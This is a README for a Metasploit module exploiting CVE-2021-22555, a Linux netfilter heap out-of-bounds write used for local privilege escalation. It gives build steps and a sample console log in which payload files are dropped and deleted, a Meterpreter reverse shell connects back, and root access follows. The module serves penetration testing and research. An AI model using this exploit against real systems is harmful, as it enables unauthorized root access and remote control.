metasploit-framework/external/source/exploits/CVE-2021-22555/README.md

Netfilter_xtables_Heap_OOB_Write_Privilege_Escalation_CVE-2021-22555

Local privilege escalation (LPE) exploit for CVE-2021-22555. Tested on Ubuntu 20.04 with kernel 5.8.0-48-generic. The vulnerability was discovered by Andy Nguyen (@theflow0).

Author: Szymon Janusz

For educational/research purposes only. Use at your own risk.

Usage:

The exploit binary must be built in a Linux environment because it relies on Linux header files.

To build:

```
make ubuntu
```

To run:

```
msf6 exploit(linux/local/netfilter_xtables_heap_oob_write_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is running kernel release 5.8.0-48-generic.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/var/tmp/flTJOaqhI' (734660 bytes) ...
[*] Uploading payload...
[*] Writing '/var/tmp/ckaFBkiL' (250 bytes) ...
[*] Running payload on remote system...
[*] Sending stage (3012548 bytes) to 192.168.1.67
[+] Deleted /var/tmp/flTJOaqhI
[+] Deleted /var/tmp/ckaFBkiL
[*] Meterpreter session 2 opened (192.168.1.145:4444 -> 192.168.1.67:43322) at 2021-09-28 14:20:41 +0100
[*] Payload executed!

meterpreter > getuid
Server username: root @ ubuntu-virtual-machine (uid=0, gid=0, euid=0, egid=0)
```

For details, see the writeup "CVE-2021-22555: Turning \x00\x00 into 10000$".